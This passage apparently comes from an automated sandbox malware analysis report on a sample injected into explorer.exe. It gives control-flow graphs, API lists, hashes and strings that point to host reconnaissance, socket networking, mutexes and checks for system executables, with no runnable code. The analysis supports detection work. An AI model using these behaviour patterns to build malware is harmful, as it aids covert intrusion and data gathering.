                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait$ExitLocalProcess$AllocFileFreeLibraryLoadModuleMutexNameOpen
                                                                            • String ID: KERNEL32.DLL${04D458D6-7C6C-445F-AEAD-313D698F1F0A}${C3397568-8840-4085-8F6E-BC07C085BB3B}${C55632B1-A307-4128-9468-89792C176C2F}${CCEFB138-B038-41E1-AC53-171A4E58AB6A}${F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}
                                                                            • API String ID: 2953619224-2614908309
                                                                            • Opcode ID: 93441eb68335b5b3d220e0fefe755afec2e770ad6dcdce4deff89af1890eb6f3
                                                                            • Instruction ID: 995c047491555bed908a3b2bfb688fd428997c956d74a0335b37787521f0db8b
                                                                            • Opcode Fuzzy Hash: 93441eb68335b5b3d220e0fefe755afec2e770ad6dcdce4deff89af1890eb6f3
                                                                            • Instruction Fuzzy Hash: 7CB14F31108A88C6F720EB65F89477A73E2F785754F504255E78A876A4DF7CC58CCB01
                                                                            Function 00BF6790 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 239memoryfilestringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 784 bf6790-bf67aa call bf59a0 787 bf67ac-bf67ae 784->787 788 bf67b3-bf67cf call bef790 784->788 789 bf6cee-bf6cf5 787->789 792 bf6cec 788->792 793 bf67d5-bf6800 call bf5a80 788->793 792->789 796 bf6806-bf6821 LocalAlloc 793->796 797 bf6ce1-bf6ce6 LocalFree 793->797 798 bf6cbb-bf6cc1 796->798 799 bf6827-bf6894 lstrcpyW StrStrIW CreateFileW 796->799 797->792 800 bf6cce-bf6cd4 798->800 801 bf6cc3-bf6cc8 LocalFree 798->801 802 bf689a-bf68b0 GetFileSize 799->802 803 bf6cb0-bf6cb5 LocalFree 799->803 800->797 804 bf6cd6-bf6cdb LocalFree 800->804 801->800 805 bf6c9d-bf6ca3 802->805 806 bf68b6-bf68d2 LocalAlloc 802->806 803->798 804->797 805->803 807 bf6ca5-bf6caa CloseHandle 805->807 806->805 808 bf68d8-bf6909 ReadFile 806->808 807->803 809 bf690f-bf6974 CloseHandle 808->809 810 bf6c92-bf6c97 LocalFree 808->810 811 bf6986-bf6994 809->811 810->805 812 bf6996-bf69de call bfcee0 811->812 813 bf69e0-bf69fb call c00d00 811->813 812->811 813->810 819 bf6a01-bf6a23 call bf7330 813->819 822 bf6c3d-bf6c46 819->822 823 bf6a29-bf6a4a LocalAlloc 819->823 822->810 825 bf6c48-bf6c66 call bf72b0 822->825 823->822 824 bf6a50-bf6a71 LocalAlloc 823->824 826 bf6c2f-bf6c37 LocalFree 824->826 827 bf6a77-bf6b41 call c08b30 lstrcpyW * 3 824->827 825->810 832 bf6c68-bf6c8c VirtualFree 825->832 826->822 835 bf6b47-bf6b52 827->835 836 bf6c21-bf6c29 LocalFree 827->836 832->810 837 bf6b64-bf6b6c 835->837 836->826 837->836 838 bf6b72-bf6b92 837->838 839 bf6c1c 838->839 840 bf6b98-bf6bc3 838->840 839->837 841 bf6bc5-bf6bdb 840->841 842 bf6be3-bf6c17 LocalFree * 4 840->842 841->842 842->789
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                                                                            • String ID: .DLL
                                                                            • API String ID: 2968648924-899428287
                                                                            • Opcode ID: c835d2fc4517c61167d87ad35f42fce30401e87f3c95d43c93a165d29785e5dc
                                                                            • Instruction ID: 7685dff310705201373fa3d18f7d44353d1a5138c58446b5e7d0b0b66e267e81
                                                                            • Opcode Fuzzy Hash: c835d2fc4517c61167d87ad35f42fce30401e87f3c95d43c93a165d29785e5dc
                                                                            • Instruction Fuzzy Hash: FBD1B436218B8486E764DB15F4947AAB7A1F7C5790F504225EBDE83BA8DF7CC489CB00
                                                                            Function 00C05F4B Relevance: 45.2, APIs: 30, Instructions: 156synchronizationmemorythreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 844 c05f4b 845 c05f6e-c05f7e call c06f30 844->845 848 c05f84-c05fb1 setsockopt 845->848 849 c06257-c0625e 845->849 850 c05fb7-c05fd5 CreateEventW 848->850 851 c06209-c0620f 848->851 852 c06260-c06267 849->852 853 c06283 849->853 850->851 856 c05fdb-c05ffc LocalAlloc 850->856 857 c06211-c06226 shutdown closesocket 851->857 858 c0622c-c06255 CloseHandle call c01f90 851->858 852->853 854 c06269-c06270 852->854 855 c06287-c06299 WaitForSingleObject 853->855 854->853 859 c06272-c06279 854->859 860 c05e89-c05e90 855->860 861 c06002-c06047 CreateThread 856->861 862 c061f5-c06200 CloseHandle 856->862 857->858 858->853 859->853 864 c0627b-c0627d ExitProcess 859->864 865 c05e96-c05eaa WaitForSingleObject 860->865 866 c0629e-c062b0 WaitForSingleObject 860->866 867 c061dc-c061e5 861->867 868 c0604d-c0605d GetTickCount 861->868 862->851 865->866 870 c05eb0-c05eb8 865->870 871 c062b2-c062c7 SetEvent WaitForSingleObject 866->871 872 c062cd-c062d3 866->872 867->862 873 c061e7-c061ef LocalFree 867->873 874 c06064-c0606b 868->874 875 c05ef0-c05f23 SleepEx WaitForSingleObject 870->875 876 c05eba-c05ece WaitForSingleObject 870->876 871->872 877 c062d5-c062e0 CloseHandle 872->877 878 c062e9-c062ef 872->878 873->862 879 c06071-c06079 874->879 880 c06173-c061d3 shutdown closesocket SetEvent WaitForSingleObject call c06dd0 call bf3ae0 CloseHandle 874->880 883 c05f25-c05f32 WaitForSingleObject 875->883 884 c05f36-c05f3d 875->884 876->875 882 c05ed0-c05ee7 WaitForSingleObject 876->882 877->878 887 c062f1-c062fc CloseHandle 878->887 888 c06305 878->888 885 c06096-c060aa WaitForSingleObject 879->885 886 c0607b-c0608f WaitForSingleObject 879->886 880->867 890 c05ee9 882->890 891 c05eee 882->891 883->884 892 c05f52-c05f5a 884->892 893 c05f3f-c05f47 884->893 895 c060b1-c060c5 WaitForSingleObject 885->895 896 c060ac 885->896 886->885 894 c06091 886->894 887->888 897 c0630a-c06328 CloseHandle 888->897 898 c06305 call c06dd0 888->898 890->866 891->860 903 c05f60-c05f68 892->903 904 c06285 892->904 901 c05f49 893->901 902 c05f4d 893->902 894->880 905 c060c7 895->905 906 c060cc-c060f6 call c03370 895->906 896->880 908 c06340-c06346 897->908 909 c0632a-c0633a ReleaseMutex CloseHandle 897->909 898->897 901->845 902->855 903->845 903->904 904->866 905->880 914 c060f8 906->914 915 c060fa-c06102 906->915 912 c06353-c06367 CloseHandle 908->912 913 c06348-c0634d CloseHandle 908->913 909->908 913->912 914->880 917 c06104-c0610f WSAGetLastError 915->917 918 c0612b-c06133 915->918 919 c06111-c06123 GetTickCount 917->919 920 c06129 917->920 921 c06163-c0616e SleepEx 918->921 922 c06135-c0613b GetTickCount 918->922 923 c06125 919->923 924 c06127 919->924 920->880 921->874 925 c06142-c0615f call c03370 922->925 923->880 924->918 925->921 928 c06161 925->928 928->925
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocalclosesocketshutdown$AllocCountExitFreeMutexProcessReleaseThreadTicklstrcpysetsockopt
                                                                            • String ID:
                                                                            • API String ID: 2113405211-0
                                                                            • Opcode ID: da3e3ea024555c63040bb402e8a4c16753c7aee5ae72899c74fb8080f737bd34
                                                                            • Instruction ID: 8bd92afe841ac248d0c038b4f67c3ea10ce6217f420084eb10279f3d6a3ef704
                                                                            • Opcode Fuzzy Hash: da3e3ea024555c63040bb402e8a4c16753c7aee5ae72899c74fb8080f737bd34
                                                                            • Instruction Fuzzy Hash: 6A91CA31114E8082F750DF65F86876EB3A1F7C4B55F205225E69A86AF8CFBCC999DB00
                                                                            Function 00C059A0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 100librarymemoryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1133 c059a0-c059c2 LocalAlloc 1134 c05b91 1133->1134 1135 c059c8-c059e0 LoadLibraryW 1133->1135 1136 c05b93-c05b9a 1134->1136 1137 c059e2-c059ef LocalFree 1135->1137 1138 c059f4-c05a11 GetProcAddress 1135->1138 1137->1136 1139 c05a13-c05a20 LocalFree 1138->1139 1140 c05a25-c05a4c call c091b0 RtlGetVersion 1138->1140 1139->1136 1143 c05a60-c05ad1 GetUserGeoID gethostname 1140->1143 1144 c05a4e-c05a5b LocalFree 1140->1144 1145 c05b86-c05b8b LocalFree 1143->1145 1146 c05ad7-c05af6 gethostbyname 1143->1146 1144->1136 1145->1134 1146->1145 1147 c05afc-c05b41 GetComputerNameExW 1146->1147 1147->1145 1148 c05b43-c05b6b GetUserNameW 1147->1148 1148->1145 1149 c05b6d-c05b84 GetTickCount64 1148->1149 1149->1136
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32 ref: 00C059B1
                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C059CF
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C059E7
                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C05A00
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C05A18
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AddressAllocLibraryLoadProc
                                                                            • String ID: NTDLL.DLL$RtlGetVersion
                                                                            • API String ID: 2539306102-196638859
                                                                            • Opcode ID: 0d27c10a1c70186e5df40a47e7e09c762f60f04c80899255b6a6916c10d5c2a6
                                                                            • Instruction ID: a7af4d5e7d3aa7358ce35e473924c9d82eec28847d490c78b0781c7f6574929d
                                                                            • Opcode Fuzzy Hash: 0d27c10a1c70186e5df40a47e7e09c762f60f04c80899255b6a6916c10d5c2a6
                                                                            • Instruction Fuzzy Hash: 8651D536609A8487EB24DF15E4947AA73B0F78CB44F504625EA8E877A8DF7DC648CF00
                                                                            Function 00BE9AC0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 77memoryfilesynchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1150 be9ac0-be9ac5 1151 be9ac9-be9ae0 WaitForSingleObject 1150->1151 1152 be9ae6-be9aff SHGetKnownFolderPath 1151->1152 1153 be9c42-be9c48 1151->1153 1154 be9c3d 1152->1154 1155 be9b05-be9b20 LocalAlloc 1152->1155 1154->1151 1156 be9b26-be9b93 call c08378 CreateFileW 1155->1156 1157 be9c32-be9c37 CoTaskMemFree 1155->1157 1160 be9c14-be9c1a 1156->1160 1161 be9b95-be9b9c 1156->1161 1157->1154 1164 be9c1c-be9c21 CloseHandle 1160->1164 1165 be9c27-be9c2c LocalFree 1160->1165 1162 be9b9e-be9ba5 1161->1162 1163 be9bb1-be9bfa CloseHandle LocalFree CoTaskMemFree OpenEventW 1161->1163 1162->1160 1166 be9ba7-be9baf call befba0 1162->1166 1167 be9bfc-be9c0c SetEvent CloseHandle 1163->1167 1168 be9c12 1163->1168 1164->1165 1165->1157 1166->1160 1166->1163 1167->1168 1168->1153
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait
                                                                            • String ID: %s\%s$UNLOAD.TXT${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}
                                                                            • API String ID: 2734627627-2750632160
                                                                            • Opcode ID: 999adf7efb5de75e7f3e72abff956ff9d1ee3d9d4cdc8871909be47b3c46c388
                                                                            • Instruction ID: f3c3dffc51b9186bf3f036877d10c3b0c94ca67c3a67fd3c1a5cb0e91d603a7e
                                                                            • Opcode Fuzzy Hash: 999adf7efb5de75e7f3e72abff956ff9d1ee3d9d4cdc8871909be47b3c46c388
                                                                            • Instruction Fuzzy Hash: 0241EC31114A8182FB20AB55F86875EB3B1F7C57B5F600365E6AA46AE8CF7DC489CB00
                                                                            Function 00BE9C50 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 57memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameWindows_errno_invalid_parameter_noinfolstrcmpi
                                                                            • String ID: %s\explorer.exe
                                                                            • API String ID: 3179574994-2893622748
                                                                            • Opcode ID: d73407e702f3e9900842d0ef6f45a51916b541201d51ea320fa7185e205cb6b6
                                                                            • Instruction ID: 49e2911ffb1a95d549ef90c5813a480e11a0c0f206ba74999d402fab17e31369
                                                                            • Opcode Fuzzy Hash: d73407e702f3e9900842d0ef6f45a51916b541201d51ea320fa7185e205cb6b6
                                                                            • Instruction Fuzzy Hash: 5721EE3521899582E7309B11E85476A63A1FBCDB95F044235AA8E46779CF3CC58D8B00
                                                                            Function 00BE9D70 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 57memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem_errno_invalid_parameter_noinfolstrcmpi
                                                                            • String ID: %s\svchost.exe
                                                                            • API String ID: 3414592467-1955667316
                                                                            • Opcode ID: 7ea0dabbf5ab00420ceef3eb4f7952fc56c8f4e5ffee73bec6ceeb712eb6e34c
                                                                            • Instruction ID: 241a198a066c0b496d55662c418c8edb96e8e25a41a31fefb93194ed66e2c42b
                                                                            • Opcode Fuzzy Hash: 7ea0dabbf5ab00420ceef3eb4f7952fc56c8f4e5ffee73bec6ceeb712eb6e34c
                                                                            • Instruction Fuzzy Hash: 9C21BC35618A8582E7309B15E85476A63A1FBCDB94F144235EA8E47B79CF3CC58D8700
                                                                            Function 00BE9E90 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 57memorystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem_errno_invalid_parameter_noinfolstrcmpi
                                                                            • String ID: %s\cmd.exe
                                                                            • API String ID: 3414592467-923833829
                                                                            • Opcode ID: a48fb2a67d39b3c14bb10d2fca17362bdfa31f77588528880a644213d4eb659e
                                                                            • Instruction ID: 3cdd9e4faf7351f69c6de6400cf1a971554cd527466d2e0951c81791e9ba1269
                                                                            • Opcode Fuzzy Hash: a48fb2a67d39b3c14bb10d2fca17362bdfa31f77588528880a644213d4eb659e
                                                                            • Instruction Fuzzy Hash: 0B219C35618A8582E7309B15E85476A63A1FBCDB95F144235BA8E87B79CF3CC58D8700
                                                                            Function 00C051B0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 255stringnetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32 ref: 00C051ED
                                                                              • Part of subcall function 00C057B0: CoInitializeEx.COMBASE ref: 00C057DA
                                                                              • Part of subcall function 00C057B0: CoCreateGuid.COMBASE ref: 00C057ED
                                                                              • Part of subcall function 00C057B0: StringFromGUID2.COMBASE ref: 00C0580B
                                                                              • Part of subcall function 00C057B0: wsprintfA.USER32 ref: 00C0582D
                                                                              • Part of subcall function 00C057B0: LocalAlloc.KERNEL32 ref: 00C0583D
                                                                              • Part of subcall function 00C057B0: und_memcpy.LIBCMTD ref: 00C058B4
                                                                              • Part of subcall function 00C057B0: LocalFree.KERNEL32 ref: 00C058C1
                                                                              • Part of subcall function 00C057B0: CoUninitialize.COMBASE ref: 00C058C7
                                                                            • setsockopt.WS2_32 ref: 00C052EC
                                                                            • LocalFree.KERNEL32 ref: 00C05772
                                                                              • Part of subcall function 00C04740: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C0477F
                                                                              • Part of subcall function 00C059A0: LocalAlloc.KERNEL32 ref: 00C059B1
                                                                              • Part of subcall function 00C059A0: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C059CF
                                                                              • Part of subcall function 00C059A0: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C055BD), ref: 00C059E7
                                                                              • Part of subcall function 00C04C90: WSACreateEvent.WS2_32 ref: 00C04D29
                                                                            • LocalFree.KERNEL32 ref: 00C05764
                                                                              • Part of subcall function 00C04740: WSACreateEvent.WS2_32 ref: 00C047D9
                                                                            • CreateEventW.KERNEL32 ref: 00C056E0
                                                                            • WSAEventSelect.WS2_32 ref: 00C0570F
                                                                            • und_memcpy.LIBCMTD ref: 00C0573F
                                                                            • CloseHandle.KERNEL32 ref: 00C05756
                                                                            • shutdown.WS2_32 ref: 00C05785
                                                                            • closesocket.WS2_32 ref: 00C05793
                                                                              • Part of subcall function 00C05BB0: LocalAlloc.KERNEL32 ref: 00C05BC1
                                                                              • Part of subcall function 00C05BB0: lstrcpyW.KERNEL32 ref: 00C05C05
                                                                              • Part of subcall function 00C05BB0: GetModuleFileNameW.KERNEL32 ref: 00C05C25
                                                                              • Part of subcall function 00C05BB0: LocalFree.KERNEL32 ref: 00C05C34
                                                                              • Part of subcall function 00C04C90: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C04CCF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$CreateEventTimer$Alloc$ChangeConcurrency::details::platform::__Queueund_memcpy$CloseFileFromGuidHandleInitializeLibraryLoadModuleNameSelectStringUninitializeclosesocketlstrcpylstrlensetsockoptshutdownwsprintf
                                                                            • String ID: 8
                                                                            • API String ID: 1160820747-4194326291
                                                                            • Opcode ID: 7744c4e00b3501b588a20af34e49b89a779c10dbf6e343e0beb01c25e0c734aa
                                                                            • Instruction ID: 5f8e9592dce9ea3b3738529d1fc90b12f0db066cd30410df8a0e144c40f081a8
                                                                            • Opcode Fuzzy Hash: 7744c4e00b3501b588a20af34e49b89a779c10dbf6e343e0beb01c25e0c734aa
                                                                            • Instruction Fuzzy Hash: 9ED1AF76218BC48AE7709B15E4447DAB7A4F389794F800526EB8D43BA8DF7DC688CF41
                                                                            Function 00BF7980 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63windowregistryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
